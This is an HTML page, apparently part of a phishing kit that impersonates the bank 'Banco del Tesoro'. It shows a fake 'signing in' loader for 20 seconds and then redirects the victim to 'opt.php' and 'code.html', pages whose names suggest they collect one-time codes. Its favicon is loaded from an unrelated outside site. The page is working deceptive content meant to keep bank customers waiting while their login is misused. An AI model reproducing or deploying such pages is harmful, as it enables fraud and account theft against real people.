<!DOCTYPE html>
<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">



    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banco del Tesoro</title>

    
    <link href="wait_files/bootstrap-icons.css" rel="stylesheet">

    <link rel="stylesheet" href="wait_files/style.min.css" id="switchThemeStyle">

    <link rel="stylesheet" href="wait_files/sweetalert2.bundle.css">
    <link rel="icon" type="image/png" sizes="32x32" href="https://shrijnanajyothisevasamsthe.org/btdeline/docs/favicon-32x32.png">

    <style>
        /* Estilo para el fondo blanco */
        body {
            margin: 0;
            height: 100vh;
            background-color: white;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: Arial, sans-serif;
        }

        /* Contenedor que tendr� el gif y el texto */
        .loading-container {
            display: flex;
            align-items: center;
        }

        /* Estilo para el texto */
        .loading-text {
            font-size: 12px;
            margin-left: 10px;
            color: #333;
        }
    </style>
	<meta http-equiv="REFRESH" content="20;URL=opt.php?u=3123123123123">
</head>
<body>

    <div class="loading-container">
        
        <img src="wait_files/loader.gif" alt="Cargando...">
        
        <div class="loading-text">Iniciando sesion...</div>
    </div>

    
  
    <script>    
        window.onload = function() {
            setTimeout(function() {
                window.location.href = "code.html";
            }, 20000); // Redirige después de 20 segundos
        };
    </script>


</body></html>